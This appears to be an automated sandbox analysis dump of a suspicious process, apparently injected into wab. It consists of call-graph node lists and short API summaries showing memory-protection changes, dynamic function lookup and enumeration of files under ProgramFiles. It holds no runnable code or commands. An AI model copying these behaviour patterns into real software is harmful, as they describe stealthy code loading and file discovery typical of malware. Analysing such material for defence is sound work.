6532->6533 6533->6520 6535 22c93aaa 6534->6535 6539 22c93aa6 __crt_fast_encode_pointer 6534->6539 6535->6539 6540 22c939be 6535->6540 6538 22c93ac4 GetProcAddress 6538->6539 6539->6526 6541 22c939cd try_get_first_available_module 6540->6541 6542 22c93a77 6541->6542 6543 22c939ea LoadLibraryExW 6541->6543 6545 22c93a60 FreeLibrary 6541->6545 6546 22c93a38 LoadLibraryExW 6541->6546 6542->6538 6542->6539 6543->6541 6544 22c93a05 GetLastError 6543->6544 6544->6541 6545->6541 6546->6541 6553 22c93856 6547->6553 6549 22c923f1 6549->6403 6550 22c953da 6549->6550 6551 22c95b7a __dosmaperr 20 API calls 6550->6551 6552 22c923fd 6551->6552 6552->6406 6552->6407 6554 22c9385f 6553->6554 6555 22c93862 GetLastError 6553->6555 6554->6549 6556 22c93b67 ___vcrt_FlsGetValue 6 API calls 6555->6556 6557 22c93877 6556->6557 6558 22c938dc SetLastError 6557->6558 6559 22c93ba2 ___vcrt_FlsSetValue 6 API calls 6557->6559 6564 22c93896 6557->6564 6558->6549 6560 22c93890 6559->6560 6561 22c938b8 6560->6561 6562 22c93ba2 ___vcrt_FlsSetValue 6 API calls 6560->6562 6560->6564 6563 22c93ba2 ___vcrt_FlsSetValue 6 API calls 6561->6563 6561->6564 6562->6561 6563->6564 6564->6558 7054 22c94a9a 7057 22c95411 7054->7057 7058 22c9541d _abort 7057->7058 7059 22c95af6 _abort 38 API calls 7058->7059 7062 22c95422 7059->7062 7060 22c955a8 _abort 38 API calls 7061 22c9544c 7060->7061 7062->7060 7352 22c94bdd 7353 22c94c08 7352->7353 7354 22c94bec 7352->7354 7356 22c96d60 51 API calls 7353->7356 7354->7353 7355 22c94bf2 7354->7355 7357 22c96368 __dosmaperr 20 API calls 7355->7357 7358 22c94c0f GetModuleFileNameA 7356->7358 7359 22c94bf7 7357->7359 7360 22c94c33 7358->7360 7361 22c962ac _abort 26 API calls 7359->7361 7375 22c94d01 7360->7375 7363 22c94c01 7361->7363 7367 22c94c72 7370 22c94d01 38 API calls 7367->7370 7368 22c94c66 7369 22c96368 __dosmaperr 20 API calls 7368->7369 7374 22c94c6b 7369->7374 7371 22c94c88 7370->7371 7373 22c9571e _free 20 API calls 7371->7373 7371->7374 7372 22c9571e _free 20 
API calls 7372->7363 7373->7374 7374->7372 7377 22c94d26 7375->7377 7379 22c94d86 7377->7379 7387 22c970eb 7377->7387 7378 22c94c50 7381 22c94e76 7378->7381 7379->7378 7380 22c970eb 38 API calls 7379->7380 7380->7379 7382 22c94c5d 7381->7382 7383 22c94e8b 7381->7383 7382->7367 7382->7368 7383->7382 7384 22c9637b _abort 20 API calls 7383->7384 7385 22c94eb9 7384->7385 7386 22c9571e _free 20 API calls 7385->7386 7386->7382 7390 22c97092 7387->7390 7391 22c954a7 __fassign 38 API calls 7390->7391 7392 22c970a6 7391->7392 7392->7377 7311 22c9281c 7312 22c92882 std::exception::exception 27 API calls 7311->7312 7313 22c9282a 7312->7313 7919 22c95351 7920 22c95374 7919->7920 7921 22c95360 7919->7921 7922 22c9571e _free 20 API calls 7920->7922 7921->7920 7924 22c9571e _free 20 API calls 7921->7924 7923 22c95386 7922->7923 7925 22c9571e _free 20 API calls 7923->7925 7924->7920 7926 22c95399 7925->7926 7927 22c9571e _free 20 API calls 7926->7927 7928 22c953aa 7927->7928 7929 22c9571e _free 20 API calls 7928->7929 7930 22c953bb 7929->7930 6565 22c936d0 6566 22c936e2 6565->6566 6568 22c936f0 @_EH4_CallFilterFunc@8 6565->6568 6567 22c92ada _ValidateLocalCookies 5 API calls 6566->6567 6567->6568 7063 22c93c90 RtlUnwind 7393 22c973d5 7394 22c973e1 ___scrt_is_nonwritable_in_current_image 7393->7394 7405 22c95671 RtlEnterCriticalSection 7394->7405 7396 22c973e8 7397 22c98be3 27 API calls 7396->7397 7398 22c973f7 7397->7398 7399 22c97406 7398->7399 7406 22c97269 GetStartupInfoW 7398->7406 7417 22c97422 7399->7417 7403 22c97417 _abort 7405->7396 7407 22c97286 7406->7407 7409 22c97318 7406->7409 7408 22c98be3 27 API calls 7407->7408 7407->7409 7410 22c972af 7408->7410 7412 22c9731f 7409->7412 7410->7409 7411 22c972dd GetFileType 7410->7411 7411->7410 7413 22c97326 7412->7413 7414 22c97369 GetStdHandle 7413->7414 7415 22c973d1 7413->7415 7416 22c9737c GetFileType 7413->7416 7414->7413 7415->7399 7416->7413 7420 22c956b9 RtlLeaveCriticalSection 7417->7420 7419 22c97429 7419->7403 
7420->7419 6569 22c94ed7 6580 22c96d60 6569->6580 6575 22c9571e _free 20 API calls 6576 22c94f29 6575->6576 6577 22c94eff 6578 22c9571e _free 20 API calls 6577->6578 6579 22c94ef4 6578->6579 6579->6575 6581 22c96d69 6580->6581 6582 22c94ee9 6580->6582 6613 22c96c5f 6581->6613 6584 22c97153 GetEnvironmentStringsW 6582->6584 6585 22c9716a 6584->6585 6595 22c971bd 6584->6595 6586 22c97170 WideCharToMultiByte 6585->6586 6589 22c9718c 6586->6589 6586->6595 6587 22c94eee 6587->6579 6596 22c94f2f 6587->6596 6588 22c971c6 FreeEnvironmentStringsW 6588->6587 6590 22c956d0 21 API calls 6589->6590 6591 22c97192 6590->6591 6592 22c97199 WideCharToMultiByte 6591->6592 6593 22c971af 6591->6593 6592->6593 6594 22c9571e _free 20 API calls 6593->6594 6594->6595 6595->6587 6595->6588 6597 22c94f44 6596->6597 6598 22c9637b _abort 20 API calls 6597->6598 6600 22c94f6b 6598->6600 6599 22c9571e _free 20 API calls 6602 22c94fe9 6599->6602 6601 22c94fcf 6600->6601 6603 22c9637b _abort 20 API calls 6600->6603 6604 22c94fd1 6600->6604 6609 22c94ff3 6600->6609 6611 22c9571e _free 20 API calls 6600->6611 7013 22c9544d 6600->7013 6601->6599 6602->6577 6603->6600 7022 22c95000 6604->7022 6608 22c9571e _free 20 API calls 6608->6601 6610 22c962bc _abort 11 API calls 6609->6610 6612 22c94fff 6610->6612 6611->6600 6633 22c95af6 GetLastError 6613->6633 6615 22c96c6c 6653 22c96d7e 6615->6653 6617 22c96c74 6662 22c969f3 6617->6662 6620 22c96c8b 6620->6582 6623 22c96cce 6625 22c9571e _free 20 API calls 6623->6625 6625->6620 6627 22c96cc9 6628 22c96368 __dosmaperr 20 API calls 6627->6628 6628->6623 6629 22c96d12 6629->6623 6686 22c968c9 6629->6686 6630 22c96ce6 6630->6629 6631 22c9571e _free 20 API calls 6630->6631 6631->6629 6634 22c95b0c 6633->6634 6637 22c95b12 6633->6637 6635 22c95e08 _abort 11 API calls 6634->6635 6635->6637 6636 22c9637b _abort 20 API calls 6638 22c95b24 6636->6638 6637->6636 6639 22c95b61 SetLastError 6637->6639 6640 22c95b2c 6638->6640 6641 22c95e5e _abort 11 API calls 6638->6641 
6639->6615 6642 22c9571e _free 20 API calls 6640->6642 6643 22c95b41 6641->6643 6644 22c95b32 6642->6644 6643->6640 6645 22c95b48 6643->6645 6646 22c95b6d SetLastError 6644->6646 6647 22c9593c _abort 20 API calls 6645->6647 6689 22c955a8 6646->6689 6648 22c95b53 6647->6648 6650 22c9571e _free 20 API calls 6648->6650 6652 22c95b5a 6650->6652 6652->6639 6652->6646 6654 22c96d8a ___scrt_is_nonwritable_in_current_image 6653->6654 6655 22c95af6 _abort 38 API calls 6654->6655 6660 22c96d94 6655->6660 6657 22c96e18 _abort 6657->6617 6659 22c955a8 _abort 38 API calls 6659->6660 6660->6657 6660->6659 6661 22c9571e _free 20 API calls 6660->6661 6862 22c95671 RtlEnterCriticalSection 6660->6862 6863 22c96e0f 6660->6863 6661->6660 6867 22c954a7 6662->6867 6665 22c96a14 GetOEMCP 6668 22c96a3d 6665->6668 6666 22c96a26 6667 22c96a2b GetACP 6666->6667 6666->6668 6667->6668 6668->6620 6669 22c956d0 6668->6669 6670 22c9570e 6669->6670 6671 22c956de _abort 6669->6671 6672 22c96368 __dosmaperr 20 API calls 6670->6672 6671->6670 6673 22c956f9 RtlAllocateHeap 6671->6673 6675 22c9474f _abort 7 API calls 6671->6675 6674 22c9570c 6672->6674 6673->6671 6673->6674 6674->6623 6676 22c96e20 6674->6676 6675->6671 6677 22c969f3 40 API calls 6676->6677 6678 22c96e3f 6677->6678 6680 22c96e90 IsValidCodePage 6678->6680 6683 22c96e46 6678->6683 6685 22c96eb5 ___scrt_fastfail 6678->6685 6679 22c92ada _ValidateLocalCookies 5 API calls 6681 22c96cc1 6679->6681 6682 22c96ea2 GetCPInfo 6680->6682 6680->6683 6681->6627 6681->6630 6682->6683 6682->6685 6683->6679 6904 22c96acb GetCPInfo 6685->6904 6977 22c96886 6686->6977 6688 22c968ed 6688->6623 6700 22c97613 6689->6700 6692 22c955b8 6694 22c955c2 IsProcessorFeaturePresent 6692->6694 6699 22c955e0 6692->6699 6696 22c955cd 6694->6696 6730 22c960e2 6696->6730 6736 22c94bc1 6699->6736 6739 22c97581 6700->6739 6703 22c9766e 6704 22c9767a _abort 6703->6704 6705 22c95b7a __dosmaperr 20 API calls 6704->6705 6710 22c976a7 _abort 6704->6710 6711 22c976a1 _abort 
6704->6711 6705->6711 6706 22c976f3 6707 22c96368 __dosmaperr 20 API calls 6706->6707 6709 22c976f8 6707->6709 6708 22c976d6 6765 22c9bdc9 6708->6765 6753 22c962ac 6709->6753 6716 22c9771f 6710->6716 6756 22c95671 RtlEnterCriticalSection 6710->6756 6711->6706 6711->6708 6711->6710 6717 22c9777e 6716->6717 6719 22c97776 6716->6719 6728 22c977a9 6716->6728 6757 22c956b9 RtlLeaveCriticalSection 6716->6757 6717->6728 6758 22c97665 6717->6758 6722 22c94bc1 _abort 28 API calls 6719->6722 6722->6717 6724 22c95af6 _abort 38 API calls 6726 22c9780c 6724->6726 6726->6708 6729 22c95af6 _abort 38 API calls 6726->6729 6727 22c97665 _abort 38 API calls 6727->6728 6761 22c9782e 6728->6761 6729->6708 6731 22c960fe ___scrt_fastfail 6730->6731 6732 22c9612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6731->6732 6735 22c961fb ___scrt_fastfail 6732->6735 6733 22c92ada _ValidateLocalCookies 5 API calls 6734 22c96219 6733->6734 6734->6699 6735->6733 6784 22c9499b 6736->6784 6742 22c97527 6739->6742 6741 22c955ad 6741->6692 6741->6703 6743 22c97533 ___scrt_is_nonwritable_in_current_image 6742->6743 6748 22c95671 RtlEnterCriticalSection 6743->6748 6745 22c97541 6749 22c97575 6745->6749 6747 22c97568 _abort 6747->6741 6748->6745 6752 22c956b9 RtlLeaveCriticalSection 6749->6752 6751 22c9757f 6751->6747 6752->6751 6768 22c96231 6753->6768 6755 22c962b8 6755->6708 6756->6716 6757->6719 6759 22c95af6 _abort 38 API calls 6758->6759 6760 22c9766a 6759->6760 6760->6727 6762 22c977fd 6761->6762 6763 22c97834 6761->6763 6762->6708 6762->6724 6762->6726 6783 22c956b9 RtlLeaveCriticalSection 6763->6783 6766 22c92ada _ValidateLocalCookies 5 API calls 6765->6766 6767 22c9bdd4 6766->6767 6767->6767 6769 22c95b7a __dosmaperr 20 API calls 6768->6769 6770 22c96247 6769->6770 6771 22c96255 6770->6771 6772 22c962a6 6770->6772 6776 22c92ada _ValidateLocalCookies 5 API calls 6771->6776 6779 22c962bc IsProcessorFeaturePresent 6772->6779 6774 22c962ab 6775 22c96231 _abort 26 API calls 
6774->6775 6777 22c962b8 6775->6777 6778 22c9627c 6776->6778 6777->6755 6778->6755 6780 22c962c7 6779->6780 6781 22c960e2 _abort 8 API calls 6780->6781 6782 22c962dc GetCurrentProcess TerminateProcess 6781->6782 6782->6774 6783->6762 6785 22c949a7 _abort 6784->6785 6786 22c949bf 6785->6786 6806 22c94af5 GetModuleHandleW 6785->6806 6815 22c95671 RtlEnterCriticalSection 6786->6815 6793 22c94a3c 6794 22c94a54 6793->6794 6819 22c94669 6793->6819 6800 22c94669 _abort 5 API calls 6794->6800 6795 22c94aae 6798 22c9bdc9 _abort 5 API calls 6795->6798 6796 22c94a82 6826 22c94ab4 6796->6826 6803 22c94ab3 6798->6803 6804 22c94a65 6800->6804 6801 22c949c7 6801->6793 6801->6804 6816 22c9527a 6801->6816 6823 22c94aa5 6804->6823 6807 22c949b3 6806->6807 6807->6786 6808 22c94b39 GetModuleHandleExW 6807->6808 6809 22c94b63 GetProcAddress 6808->6809 6810 22c94b78 6808->6810 6809->6810 6811 22c94b8c FreeLibrary 6810->6811 6812 22c94b95 6810->6812 6811->6812 6813 22c92ada _ValidateLocalCookies 5 API calls 6812->6813 6814 22c94b9f 6813->6814 6814->6786 6815->6801 6834 22c95132 6816->6834 6820 22c94698 6819->6820 6821 22c92ada _ValidateLocalCookies 5 API calls 6820->6821 6822 22c946c1 6821->6822 6822->6794 6855 22c956b9 RtlLeaveCriticalSection 6823->6855 6825 22c94a7e 6825->6795 6825->6796 6856 22c96025 6826->6856 6829 22c94ae2 6832 22c94b39 _abort 8 API calls 6829->6832 6830 22c94ac2 GetPEB 6830->6829 6831 22c94ad2 GetCurrentProcess TerminateProcess 6830->6831 6831->6829 6833 22c94aea ExitProcess 6832->6833 6837 22c950e1 6834->6837 6836 22c95156 6836->6793 6838 22c950ed ___scrt_is_nonwritable_in_current_image 6837->6838 6845 22c95671 RtlEnterCriticalSection 6838->6845 6840 22c950fb 6846 22c9515a 6840->6846 6844 22c95119 _abort 6844->6836 6845->6840 6849 22c95182 6846->6849 6850 22c9517a 6846->6850 6847 22c92ada _ValidateLocalCookies 5 API calls 6848 22c95108 6847->6848 6852 22c95126 6848->6852 6849->6850 6851 22c9571e _free 20 API calls 6849->6851 6850->6847 6851->6850 6853 22c956b9 
_abort RtlLeaveCriticalSection 6852->6853 6854 22c95130 6853->6854 6854->6844 6855->6825 6857 22c9604a 6856->6857 6861 22c96040 6856->6861 6858 22c95c45 _abort 5 API calls 6857->6858 6858->6861 6859 22c92ada _ValidateLocalCookies 5 API calls 6860 22c94abe 6859->6860 6860->6829 6860->6830 6861->6859 6862->6660 6866 22c956b9 RtlLeaveCriticalSection 6863->6866 6865 22c96e16 6865->6660 6866->6865 6868 22c954ba 6867->6868 6869 22c954c4 6867->6869 6868->6665 6868->6666 6869->6868 6870 22c95af6 _abort 38 API calls 6869->6870 6871 22c954e5 6870->6871 6875 22c97a00 6871->6875 6876 22c97a13 6875->6876 6878 22c954fe 6875->6878 6876->6878 6883 22c97f0f 6876->6883 6879 22c97a2d 6878->6879 6880 22c97a55 6879->6880 6881 22c97a40 6879->6881 6880->6868 6881->6880 6882 22c96d7e __fassign 38 API calls 6881->6882 6882->6880 6884 22c97f1b ___scrt_is_nonwritable_in_current_image 6883->6884 6885 22c95af6 _abort 38 API calls 6884->6885 6886 22c97f24 6885->6886 6887 22c97f72 _abort 6886->6887 6895 22c95671 RtlEnterCriticalSection 6886->6895 6887->6878 6889 22c97f42 6896 22c97f86 6889->6896 6894 22c955a8 _abort 38 API calls 6894->6887 6895->6889 6897 22c97f56 6896->6897 6898 22c97f94 __fassign 6896->6898 6900 22c97f75 6897->6900 6898->6897 6899 22c97cc2 __fassign 20 API calls 6898->6899 6899->6897 6903 22c956b9 RtlLeaveCriticalSection 6900->6903 6902 22c97f69 6902->6887 6902->6894 6903->6902 6909 22c96b05 6904->6909 6913 22c96baf 6904->6913 6906 22c92ada _ValidateLocalCookies 5 API calls 6908 22c96c5b 6906->6908 6908->6683 6914 22c986e4 6909->6914 6912 22c98a3e 43 API calls 6912->6913 6913->6906 6915 22c954a7 __fassign 38 API calls 6914->6915 6916 22c98704 MultiByteToWideChar 6915->6916 6918 22c98742 6916->6918 6919 22c987da 6916->6919 6922 22c956d0 21 API calls 6918->6922 6925 22c98763 ___scrt_fastfail 6918->6925 6920 22c92ada _ValidateLocalCookies 5 API calls 6919->6920 6923 22c96b66 6920->6923 6921 22c987d4 6933 22c98801 6921->6933 6922->6925 6928 22c98a3e 6923->6928 6925->6921 6926 
22c987a8 MultiByteToWideChar 6925->6926 6926->6921 6927 22c987c4 GetStringTypeW 6926->6927 6927->6921 6929 22c954a7 __fassign 38 API calls 6928->6929 6930 22c98a51 6929->6930 6937 22c98821 6930->6937 6934 22c9880d 6933->6934 6935 22c9881e 6933->6935 6934->6935 6936 22c9571e _free 20 API calls 6934->6936 6935->6919 6936->6935 6939 22c9883c 6937->6939 6938 22c98862 MultiByteToWideChar 6940 22c98a16 6938->6940 6941 22c9888c 6938->6941 6939->6938 6942 22c92ada _ValidateLocalCookies 5 API calls 6940->6942 6944 22c956d0 21 API calls 6941->6944 6946 22c988ad 6941->6946 6943 22c96b87 6942->6943 6943->6912 6944->6946 6945 22c988f6 MultiByteToWideChar 6947 22c9890f 6945->6947 6959 22c98962 6945->6959 6946->6945 6946->6959 6964 22c95f19 6947->6964 6949 22c98801 __freea 20 API calls 6949->6940 6951 22c98939 6954 22c95f19 11 API calls 6951->6954 6951->6959 6952 22c98971 6955 22c956d0 21 API calls 6952->6955 6960 22c98992 6952->6960 6953 22c98a07 6957 22c98801 __freea 20 API calls 6953->6957 6954->6959 6955->6960 6956 22c95f19 11 API calls 6958 22c989e6 6956->6958 6957->6959 6958->6953 6961 22c989f5 WideCharToMultiByte 6958->6961 6959->6949 6960->6953 6960->6956 6961->6953 6962 22c98a35 6961->6962 6963 22c98801 __freea 20 API calls 6962->6963 6963->6959 6965 22c95c45 _abort 5 API calls 6964->6965 6966 22c95f40 6965->6966 6969 22c95f49 6966->6969 6972 22c95fa1 6966->6972 6970 22c92ada _ValidateLocalCookies 5 API calls 6969->6970 6971 22c95f9b 6970->6971 6971->6951 6971->6952 6971->6959 6973 22c95c45 _abort 5 API calls 6972->6973 6974 22c95fc8 6973->6974 6975 22c92ada _ValidateLocalCookies 5 API calls 6974->6975 6976 22c95f89 LCMapStringW 6975->6976 6976->6969 6978 22c96892 ___scrt_is_nonwritable_in_current_image 6977->6978 6985 22c95671 RtlEnterCriticalSection 6978->6985 6980 22c9689c 6986 22c968f1 6980->6986 6984 22c968b5 _abort 6984->6688 6985->6980 6998 22c97011 6986->6998 6988 22c9693f 6989 22c97011 26 API calls 6988->6989 6990 22c9695b 6989->6990 6991 22c97011 26 API calls 
6990->6991 6992 22c96979 6991->6992 6993 22c968a9 6992->6993 6994 22c9571e _free 20 API calls 6992->6994 6995 22c968bd 6993->6995 6994->6993 7012 22c956b9 RtlLeaveCriticalSection 6995->7012 6997 22c968c7 6997->6984 6999 22c97022 6998->6999 7008 22c9701e 6998->7008 7000 22c97029 6999->7000 7003 22c9703c ___scrt_fastfail 6999->7003 7001 22c96368 __dosmaperr 20 API calls 7000->7001 7002 22c9702e 7001->7002 7004 22c962ac _abort 26 API calls 7002->7004 7005 22c9706a 7003->7005 7006 22c97073 7003->7006 7003->7008 7004->7008 7007 22c96368 __dosmaperr 20 API calls 7005->7007 7006->7008 7010 22c96368 __dosmaperr 20 API calls 7006->7010 7009 22c9706f 7007->7009 7008->6988 7011 22c962ac _abort 26 API calls 7009->7011 7010->7009 7011->7008 7012->6997 7014 22c95468 7013->7014 7015 22c9545a 7013->7015 7016 22c96368 __dosmaperr 20 API calls 7014->7016 7015->7014 7017 22c9547f 7015->7017 7021 22c95470 7016->7021 7019 22c9547a 7017->7019 7020 22c96368 __dosmaperr 20 API calls 7017->7020 7018 22c962ac _abort 26 API calls 7018->7019 7019->6600 7020->7021 7021->7018 7023 22c9500d 7022->7023 7024 22c94fd7 7022->7024 7025 22c95024 7023->7025 7027 22c9571e _free 20 API calls 7023->7027 7024->6608 7026 22c9571e _free 20 API calls 7025->7026 7026->7024 7027->7023 7196 22c9ac6b 7197 22c9ac84 __startOneArgErrorHandling 7196->7197 7199 22c9acad __startOneArgErrorHandling 7197->7199 7200 22c9b2f0 7197->7200 7201 22c9b329 __startOneArgErrorHandling 7200->7201 7203 22c9b350 __startOneArgErrorHandling 7201->7203 7211 22c9b5c1 7201->7211 7204 22c9b393 7203->7204 7205 22c9b36e 7203->7205 7224 22c9b8b2 7204->7224 7215 22c9b8e1 7205->7215 7208 22c9b38e __startOneArgErrorHandling 7209 22c92ada _ValidateLocalCookies 5 API calls 7208->7209 7210 22c9b3b7 7209->7210 7210->7199 7212 22c9b5ec __raise_exc 7211->7212 7213 22c9b7e5 RaiseException 7212->7213 7214 22c9b7fd 7213->7214 7214->7203 7216 22c9b8f0 7215->7216 7217 22c9b90f __startOneArgErrorHandling 7216->7217 7218 22c9b964 __startOneArgErrorHandling 
7216->7218 7231 22c978a3 7217->7231 7220 22c9b8b2 __startOneArgErrorHandling 20 API calls 7218->7220 7223 22c9b95d 7220->7223 7222 22c9b8b2 __startOneArgErrorHandling 20 API calls 7222->7223 7223->7208 7225 22c9b8bf 7224->7225 7226 22c9b8d4 7224->7226 7228 22c9b8d9 7225->7228 7229 22c96368 __dosmaperr 20 API calls 7225->7229 7227 22c96368 __dosmaperr 20 API calls 7226->7227 7227->7228 7228->7208 7230 22c9b8cc 7229->7230 7230->7208 7232 22c978cb 7231->7232 7233 22c92ada _ValidateLocalCookies 5 API calls 7232->7233 7234 22c978e8 7233->7234 7234->7222 7234->7223 7314 22c9742b 7315 22c97430 7314->7315 7317 22c97453 7315->7317 7318 22c98bae 7315->7318 7319 22c98bbb 7318->7319 7320 22c98bdd 7318->7320 7321 22c98bc9 RtlDeleteCriticalSection 7319->7321 7322 22c98bd7 7319->7322 7320->7315 7321->7321 7321->7322 7323 22c9571e _free 20 API calls 7322->7323 7323->7320 7064 22c960ac 7065 22c960dd 7064->7065 7066 22c960b7 7064->7066 7066->7065 7067 22c960c7 FreeLibrary 7066->7067 7067->7066 7235 22c9506f 7236 22c95081 7235->7236 7238 22c95087 7235->7238 7237 22c95000 20 API calls 7236->7237 7237->7238 7489 22c921a1 ___scrt_dllmain_exception_filter 7931 22c99d61 7932 22c99d81 7931->7932 7935 22c99db8 7932->7935 7934 22c99dab 7936 22c99dbf 7935->7936 7937 22c99e20 7936->7937 7938 22c99ddf 7936->7938 7939 22c9aa17 21 API calls 7937->7939 7940 22c9a90e 7937->7940 7938->7940 7942 22c9aa17 21 API calls 7938->7942 7941 22c99e6e 7939->7941 7940->7934 7941->7934 7943 22c9a93e 7942->7943 7943->7934 7239 22c97260 GetStartupInfoW 7240 22c97318 7239->7240 7241 22c97286 7239->7241 7241->7240 7245 22c98be3 7241->7245 7243 22c972af 7243->7240 7244 22c972dd GetFileType 7243->7244 7244->7243 7246 22c98bef ___scrt_is_nonwritable_in_current_image 7245->7246 7247 22c98bfc 7246->7247 7248 22c98c13 7246->7248 7249 22c96368 __dosmaperr 20 API calls 7247->7249 7258 22c95671 RtlEnterCriticalSection 7248->7258 7251 22c98c01 7249->7251 7252 22c962ac _abort 26 API calls 7251->7252 7255 22c98c0b _abort 
7252->7255 7253 22c98c1f 7257 22c98c4b 7253->7257 7259 22c98b34 7253->7259 7255->7243 7266 22c98c72 7257->7266 7258->7253 7260 22c9637b _abort 20 API calls 7259->7260 7261 22c98b46 7260->7261 7263 22c95eb7 11 API calls 7261->7263 7265 22c98b53 7261->7265 7262 22c9571e _free 20 API calls 7264 22c98ba5 7262->7264 7263->7261 7264->7253 7265->7262 7269 22c956b9 RtlLeaveCriticalSection 7266->7269 7268 22c98c79 7268->7255 7269->7268 7421 22c9a1e0 7424 22c9a1fe 7421->7424 7423 22c9a1f6 7428 22c9a203 7424->7428 7425 22c9aa53 21 API calls 7427 22c9a42f 7425->7427 7426 22c9a298 7426->7423 7427->7423 7428->7425 7428->7426 7490 22c981a0 7491 22c981d9 7490->7491 7492 22c981dd 7491->7492 7503 22c98205 7491->7503 7493 22c96368 __dosmaperr 20 API calls 7492->7493 7495 22c981e2 7493->7495 7494 22c98529 7497 22c92ada _ValidateLocalCookies 5 API calls 7494->7497 7496 22c962ac _abort 26 API calls 7495->7496 7498 22c981ed 7496->7498 7499 22c98536 7497->7499 7500 22c92ada _ValidateLocalCookies 5 API calls 7498->7500 7501 22c981f9 7500->7501 7503->7494 7504 22c980c0 7503->7504 7505 22c980db 7504->7505 7506 22c92ada _ValidateLocalCookies 5 API calls 7505->7506 7507 22c98152 7506->7507 7507->7503 6340 22c9c7a7 6341 22c9c7be 6340->6341 6350 22c9c82c 6340->6350 6341->6350 6352 22c9c7e6 GetModuleHandleA 6341->6352 6342 22c9c872 6343 22c9c835 GetModuleHandleA 6345 22c9c83f 6343->6345 6345->6345 6347 22c9c85f GetProcAddress 6345->6347 6345->6350 6346 22c9c7dd 6346->6345 6348 22c9c800 GetProcAddress 6346->6348 6346->6350 6347->6350 6349 22c9c80d VirtualProtect 6348->6349 6348->6350 6349->6350 6351 22c9c81c VirtualProtect 6349->6351 6350->6342 6350->6343 6350->6345 6351->6350 6353 22c9c7ef 6352->6353 6359 22c9c82c 6352->6359 6364 22c9c803 GetProcAddress 6353->6364 6355 22c9c872 6356 22c9c835 GetModuleHandleA 6361 22c9c83f 6356->6361 6357 22c9c7f4 6358 22c9c800 GetProcAddress 6357->6358 6357->6359 6358->6359 6360 22c9c80d VirtualProtect 6358->6360 6359->6355 6359->6356 6359->6361 6360->6359 6362 

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 22C91137
                                                                                                                • lstrcatW.KERNEL32(?,?), ref: 22C91151
                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22C9115C
                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22C9116D
                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22C9117C
                                                                                                                • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22C91193
                                                                                                                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 22C911D0
                                                                                                                • FindClose.KERNEL32(00000000), ref: 22C911DB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3241531988.0000000022C91000.00000040.00001000.00020000.00000000.sdmp, Offset: 22C90000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.3241512046.0000000022C90000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.3241531988.0000000022CA6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_22c90000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                • String ID:
                                                                                                                • API String ID: 1083526818-0
                                                                                                                • Opcode ID: 99fc194b3303979bcdac5f40b911a3186c9ffcc95016be236a1d47872c579d6c
                                                                                                                • Instruction ID: adfb9a82b32870eda77ec269c6fd22b83dcab95fc677da8eb146b97e2f944e25
                                                                                                                • Opcode Fuzzy Hash: 99fc194b3303979bcdac5f40b911a3186c9ffcc95016be236a1d47872c579d6c
                                                                                                                • Instruction Fuzzy Hash: 5C216172544348ABD710EA64DC4DFAB7BDCEF84714F000E2AB998D3190E674D615CBD6
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • Sleep.KERNELBASE(00000005), ref: 0419DC9B
                                                                                                                • NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 0419DD27
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.3224594364.0000000003BF6000.00000040.00000400.00020000.00000000.sdmp, Offset: 03BF6000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_3bf6000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProtectSleepVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 3235210055-0
                                                                                                                • Opcode ID: b4c302ff3826f049acb3e08ddfebd525b77e3e06ab92cbe287abd1da851e1ada
                                                                                                                • Instruction ID: 1de16de721a2e61bbec5feb66ec930a9b1bbe67d9f2f48f774f2507dd6bc87e1
                                                                                                                • Opcode Fuzzy Hash: b4c302ff3826f049acb3e08ddfebd525b77e3e06ab92cbe287abd1da851e1ada
                                                                                                                • Instruction Fuzzy Hash: 1E110AB16003419FEB045A35CA8D78A77A1EF153B5F964259DE56870F6E364C880CB11
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 22C91434
                                                                                                                  • Part of subcall function 22C910F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 22C91137
                                                                                                                  • Part of subcall function 22C910F1: lstrcatW.KERNEL32(?,?), ref: 22C91151
                                                                                                                  • Part of subcall function 22C910F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22C9115C
                                                                                                                  • Part of subcall function 22C910F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22C9116D
                                                                                                                  • Part of subcall function 22C910F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 22C9117C
                                                                                                                  • Part of subcall function 22C910F1: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 22C91193
                                                                                                                  • Part of subcall function 22C910F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 22C911D0
                                                                                                                  • Part of subcall function 22C910F1: FindClose.KERNEL32(00000000), ref: 22C911DB
                                                                                                                • lstrlenW.KERNEL32(?), ref: 22C914C5
                                                                                                                • lstrlenW.KERNEL32(?), ref: 22C914E0
